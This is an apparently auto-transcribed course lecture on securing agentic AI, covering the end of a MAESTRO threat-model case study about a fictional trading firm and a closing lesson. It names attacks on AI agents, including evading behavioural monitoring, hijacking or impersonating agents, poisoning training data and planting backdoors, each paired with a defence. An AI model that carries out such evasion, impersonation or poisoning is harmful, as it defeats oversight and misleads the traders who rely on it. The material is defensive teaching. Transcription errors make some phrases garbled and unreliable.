your trading strategies. So what can you do enforce principles like zero
trust architecture? Like, every request
is authenticated. You want to make
sure that nobody can bypass nobody trusts
any AI agents. Every request has to
be authenticated, harden your containers, harden
your cloud infrastructure, use something like a Cloud
security posture layer five, evaluation
and observability. So here, this is all about visibility into the behavior
of the AI agents, right? And here, maybe the
attackers start looking at AI evasion attacks where
they can manipulate the AI behavior without
triggering security alert. So they are trying to mess up the AI decision patterns
by sending very, very subtle queries, right? And so what can you do here? You can implement real time behavioral monitoring to track hig suddenly there's a baseline of AI agents making decisions. Suddenly, that
baseline is changing, you're seeing that baseline
changing and you say, Hey, this is not normal
what's going on here. So this is what
you want to put in alerts and making
sure that every decision that the Agenda is
making that is explainable. So when it starts making, completely different decisions, you're able to a setback that, Hey, this decision does
not make sense, right? So that would be a
mit layer six is, of course, security
and compliance. What is the risk here? No
having security observability, but also your agentic EI violating financial
regulations, right? Breaking compliance due to misalignment with
compliance rules. Like I given example earlier, the agentic AI is told to just priortize profit over everything
else, and it says, Okay, it completely ignores all the trading regulations, the
financial guidelines, and it starts generating doing trades that violate
market regulations, that it can become a major,
major reputational risk. So what can you
do? Make sure that the compliance rules
are hard coded. These are not something that the EI can override by itself, and making sure
that you're doing continuous regulatory audits using automated
compliance monitoring. And the layer seven is
the agentic ecosystem. This is where the whole
ecosystem of the EI agents, where AI agents are
interacting with the brokers, with the traders,
with other agents. And here, of course,
the EI agents Rogue agents iska
Agent AA hijacking is there agents can get impersonated or manipulated
by the attackers. So an attacker can create
a fake AI agent that mimics omits legitimate AI bots and disrupts financial
transactions. He inserts it into
the ecosystem, and traders are interactive with it without knowing
that this is a rogue one, why? What can you do? You can implement very strong identity and
authentication mechanisms so that nobody is able
to hijack A agent using cryptographic agent
signatures so that traders and workers
know that this is the signature for an
authentic agent for Omnitek. So nobody can just
pretend to be an agent. Same. Like you see in the
Android app store and all that. How do you verify that
an app is varied? So these were the risks
that we looked at. Now, what about the cross
layer fed identification? This is a very important part of Mastroe like I said earlier. You mitigate it twist at
the individual layer. There are threats that
can propagate that can cross cut across
layers, right? So for example, data poisoning. Maybe attackers can inject manipulate data at layer two,
which is the data layer, but then that would poison
the EI model at layer one, white, causing incorrect
traits to happen. Remember, the agenda, all the layers are very closely integrated to each
other. What can you do? Make sure that the monitoring
is happening at all layers, and it can detect Anomalies in both the data inputs
and the output before final decisions
are being executed. So this is one way of
finding out about if the data poisoning is happening across layers. What
else is there? Infrastructure compromise
leading to AI manipulation. Like I said, the Cloud,
if somebody is able to bypass the security
measures in your Cloud, maybe compromise your
AWS infrastructure, he can then modify the
agentic AI framework which you've deployed,
inserting backdoors, right? Inserting his own agents were. So you need to make sure that
you have endo encryption. You have immutable
infrastructure that prevents any unauthorized
changes from happening. Nobody can just do click Ops and start deploying
infrastructure. They need to go through
the authorized pipeline. You've hardened your Cloud
security infrastructure. What else is there? AI
model extraction API. So at the layer seven, attackers are querying the
API excessively through agent ecosystem to reverse engineer the foundational model, which is there at layer one. So just to show you how these threads can cut across layers. What can you do? We've
talked about this before. Implement rate limiting
and API request monitoring so that if somebody is
continuously querying your API, you will know you can use differential privacy to obscure, to inject noise so that nobody can just find out what
data was being used. So this is just to show
you how you can do. In the project which we're
going to be doing at the end, I want you to do your own inject your own risks into the threat model, so
you get an idea also. But what happened now
we are at phase four, which is the monitoring. Now Omnitek is not
stupid, hopefully, they realize that AI risks
change over time, right? So what they have done
is they've implemented these continuous security
measures like red timing. So they've hired a company
they are doing continuously hammering these AI agents to check how resilient they are. They have developed an
incident response plan. They realize that somehow
incidents can always happen. So how do we make
sure that these are mitigated and doing
automated security updates. So basically, making sure that the threat model is not static. It's not a one time activity. You keep on doing it as
new threats come out. So by adopting this by adopting
this sort of framework, Omnitech has
successfully secured its agentic AI driven
financial automation platform, and now they have much more what do you call
assurance against this. Your financial data in
graty is maintained, regulatory compliance
is ensured, and continuous AI
monitoring is also there. So remember that, while the traditional thret
models are good, they do not address
agentic EI unique risk. That's why you need a
platform like this, which gives you like a
methodology like MIS that capture the agentic AI specific risks such
as mortal poison, agentic AI manipulation,
hijacking, and they specifically address multi agent environments where AI can collaborate with
each other, right? So I hope this was
useful to you. We're almost at the
end of the course now. Thank you very
much, and I'll see you at the conclusion
of this course.
23. 22 - Wapping Up: Hi, everybody.
Welcome, welcome now. This is the last
lesson of the course. I hope you enjoyed this lesson, and I hope I contributed to increasing your
knowledge about agentic AI. If not, I'm extremely sorry that you had to listen
to me for so long. But just to understand, now the future is
very much here. AgenticEI is not in the
future. It is here right now. It is being used
and implemented. There are like multiple
waves of AI, I always say. So the first one
was where AI used for forecasting and data
driven decision making, right? Now, the second one was
the generative AI wave, which is where we saw the amazing content that
could be generated. Using tools like Chat, GPT claw, Gemini, right, which
was a game changer. And now we're at the third wave, which is AI
independently performing complex tasks without any
constant human oversight, interacting with other agents. We are at, like,
a very key moment in technological history. And this is no joke.
This is not hype, whether you like it or
not, agentic AI is here. And I always say I always show this slide whenever
I talk about AI, that there are three
levels of AI acceptance. First people are terrified that AI is going to take their job, but they're so scared or they're too disinterested to dig any deeper or use it to
their advantage, right? The second one is, like, they realize that AI is here, but they don't know how
much AI has changed, like how much the life has
changed over the past, like, two, three
years, I would say. They're just worried, they're
not taking any action. And the last one
are people like you who are investing in
yourself by taking this course and they
decided to dive right in and learn how much they can leverage AI
for their benefit. The new workforce, the new
way people will be working is shifting from human beings using AI tools to human
beings managing AI teams now. And here you will have
AI agents that will be specializing in roles
like customer service, IT support, and human beings will be taken away
from these tasks, but you will still have jobs. Don't worry. New job roles are emerging like AI cybersecurity, AI Risk, AI agent trainers,
workflow designers, ethics. Businesses will need AI
strategy and security teams to oversee how these things are
collaborating and evolving. So it is a very exciting
time to be alive. I don't want you to be worried. I want you to be the person
on the very right here, which is happy and ready for this new environment
that is coming. How to keep learning, please do not consider this course to
be the end all and B all. ArgentiEI will keep on changing, keep on evolving.
Create your own agent. I always say instead of
just being theoretical, create your own agent using any of the frameworks
that are there. AgentiEI is here
very much to stay. Stay updated with these
sort of industry trends. The project which I
talked about now, the case study which I
showed you using Maestro, I want you to go
through it again, add your own threats and risks using the layers
that we talked about, put in your own mitigations, so that you get a
very good handle. Otherwise, you will simply
forget what I told you, honestly, speaking and
there'll be no point. You'll just forget about it. And you would have just heard, like, listen to me talking for two or 3 hours and not
apply this knowledge. So congratulations. You have reached the
end of this course. Thank you very much
for listening to me. I'm happy to connect
with you anytime. I'm there on Substack
LinkedIn on YouTube. Twitter, I'm not that active on, but please feel free
to reach out to me. I'll put in the links there. Thank you very much
for listening to me. Please do ika review for this
course. If you liked it. Even if you thought this
was a very bad course. Always happy to get feedback. Thank you very much, and I'll
see you in my next course.